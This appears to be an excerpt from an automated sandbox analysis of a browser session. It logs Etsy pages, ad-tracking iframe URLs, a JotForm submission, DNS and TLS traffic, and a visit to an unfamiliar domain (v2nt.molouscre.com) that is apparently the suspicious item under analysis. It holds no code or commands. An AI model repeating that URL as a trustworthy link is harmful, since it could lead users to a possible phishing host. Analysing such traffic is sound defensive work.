        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=9910951;type=remarkt;cat=unive0;ord=5798595693344;npa=0;auiddc=2084024919.1729505276;u2=%2Fsearch;u3=undefined;ps=1;pcor=430800937;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F?
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://ct.pinterest.com/ct.html
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: Iframe src: https://d.agkn.com/iframe/10898/?che=1729505295&gauid=2035605285.1729505280
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=8314600452759;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1103244455;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=8314600452759;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1103244455;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1729505310914&cv=11&fst=1729505310914&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Decorative%20Pendant%2C%20Ghost%2C%20Helloween%20Decoration%2C%20Children's%20Room%20Decoration%2C%20Milk%20Color%20-%20Etsy&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://9910951.fls.doubleclick.net/activityi;src=9910951;type=remarkt;cat=unive0;ord=5593085290221;npa=0;auiddc=2084024919.1729505276;u2=%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween;u3=1592961087;ps=1;pcor=680015857;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=9910951;type=remarkt;cat=unive0;ord=5593085290221;npa=0;auiddc=2084024919.1729505276;u2=%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween;u3=1592961087;ps=1;pcor=680015857;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/995917074?random=1729505312055&cv=11&fst=1729505312055&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&hn=www.googleadservices.com&frm=0&tiba=Decorative%20Pendant%2C%20Ghost%2C%20Helloween%20Decoration%2C%20Children's%20Room%20Decoration%2C%20Milk%20Color%20-%20Etsy&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D1592961087%3Becomm_pagetype%3Dproduct%3Becomm_totalvalue%3D15.00%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: //www.googletagmanager.com/ns.html?id=GTM-KWW5SS
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://8666735.fls.doubleclick.net/activityi;src=8666735;type=count0;cat=etsy_000;ord=1;num=8314600452759;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1103244455;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8666735;type=count0;cat=etsy_000;ord=1;num=8314600452759;npa=0;auiddc=2084024919.1729505276;ps=1;pcor=1103244455;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9189895925z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/658194373?random=1729505310914&cv=11&fst=1729505310914&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v870186735z86935543za201zb6935543&gcs=G111&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101794736&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&label=XwNfCLSf5dkDEMX_7LkC&hn=www.googleadservices.com&frm=0&tiba=Decorative%20Pendant%2C%20Ghost%2C%20Helloween%20Decoration%2C%20Children's%20Room%20Decoration%2C%20Milk%20Color%20-%20Etsy&value=0&bttype=purchase&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&data=ads_data_redaction%3Dfalse&ct_cookie_present=0
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://9910951.fls.doubleclick.net/activityi;src=9910951;type=remarkt;cat=unive0;ord=5593085290221;npa=0;auiddc=2084024919.1729505276;u2=%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween;u3=1592961087;ps=1;pcor=680015857;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=9910951;type=remarkt;cat=unive0;ord=5593085290221;npa=0;auiddc=2084024919.1729505276;u2=%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween;u3=1592961087;ps=1;pcor=680015857;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe4ah0v9190758491z86935543za201zb6935543;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=101686685~101794736;epver=2;~oref=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3?
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://td.doubleclick.net/td/rul/995917074?random=1729505312055&cv=11&fst=1729505312055&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4ah0v883287104z86935543za201zb6935543&gcd=13t3t3t3t5l1&dma=0&tag_exp=101686685~101836706&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.etsy.com%2Flisting%2F1592961087%2Fdecorative-pendant-ghost-helloween%3Fclick_key%3Dac1db9ef4265de83c6195918378277f4a2ed301e%253A1592961087%26click_sum%3Dfc51dadd%26ref%3Dsearch2_top_narrowing_intent_modules_etsys_pick-3&ref=https%3A%2F%2Fwww.etsy.com%2Fsearch%3Fq%3Dfelt%2Bdecor%26anchor_listing_id%3D865548874%26ref%3Dhp_bubbles_Trends_102124%26mosv%3Dsese%26moci%3D1291516025914%26mosi%3D1309216611844%26is_merch_library%3Dtrue%26dd_referrer%3Dhttps%253A%252F%252Fwww.etsy.com%252F&hn=www.googleadservices.com&frm=0&tiba=Decorative%20Pendant%2C%20Ghost%2C%20Helloween%20Decoration%2C%20Children's%20Room%20Decoration%2C%20Milk%20Color%20-%20Etsy&npa=0&pscdl=noapi&auid=2084024919.1729505276&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ecomm_prodid%3D1592961087%3Becomm_pagetype%3Dproduct%3Becomm_totalvalue%3D15.00%3Becomm_rec_prodid%3D%3Becomm_category%3D%3Becomm_pvalue%3D%3Becomm_quantity%3D%3Ba%3D%3Bg%3D%3Bhasaccount%3Dfalse%3Bcqs%3D%3Brp%3D%3Bly%3D%3Bhs%3D%3B_google_crm_id%3D%3Bads_data_redaction%3Dfalse
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: Iframe src: https://d.agkn.com/iframe/10898/?che=1729505310&gauid=2035605285.1729505280
        Source: https://submit.jotform.com/submit/242923371946059HTTP Parser: No favicon
        Source: https://submit.jotform.com/submit/242923371946059HTTP Parser: No favicon
        Source: https://v2nt.molouscre.com/wZoRh/HTTP Parser: No favicon
        Source: https://v2nt.molouscre.com/wZoRh/HTTP Parser: No favicon
        Source: https://www.etsy.com/HTTP Parser: No favicon
        Source: https://www.etsy.com/HTTP Parser: No favicon
        Source: https://www.etsy.com/HTTP Parser: No favicon
        Source: https://www.etsy.com/HTTP Parser: No favicon
        Source: https://www.etsy.com/HTTP Parser: No favicon
        Source: https://www.etsy.com/HTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=trueHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=trueHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No favicon
        Source: https://submit.jotform.com/submit/242923371946059HTTP Parser: No favicon
        Source: https://submit.jotform.com/submit/242923371946059HTTP Parser: No favicon
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No favicon
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No favicon
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No favicon
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No favicon
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No favicon
        Source: https://submit.jotform.com/server.phpHTTP Parser: No favicon
        Source: https://www.etsy.com/HTTP Parser: No <meta name="author".. found
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No <meta name="author".. found
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No <meta name="author".. found
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No <meta name="author".. found
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No <meta name="author".. found
        Source: https://www.etsy.com/HTTP Parser: No <meta name="copyright".. found
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No <meta name="copyright".. found
        Source: https://www.etsy.com/search?q=felt+decor&anchor_listing_id=865548874&ref=hp_bubbles_Trends_102124&mosv=sese&moci=1291516025914&mosi=1309216611844&is_merch_library=true&dd_referrer=https%3A%2F%2Fwww.etsy.com%2FHTTP Parser: No <meta name="copyright".. found
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No <meta name="copyright".. found
        Source: https://www.etsy.com/listing/1592961087/decorative-pendant-ghost-helloween?click_key=ac1db9ef4265de83c6195918378277f4a2ed301e%3A1592961087&click_sum=fc51dadd&ref=search2_top_narrowing_intent_modules_etsys_pick-3HTTP Parser: No <meta name="copyright".. found
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
        Source: unknownHTTPS traffic detected: 23.205.93.160:443 -> 192.168.2.16:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.205.93.160:443 -> 192.168.2.16:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49947 version: TLS 1.2
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
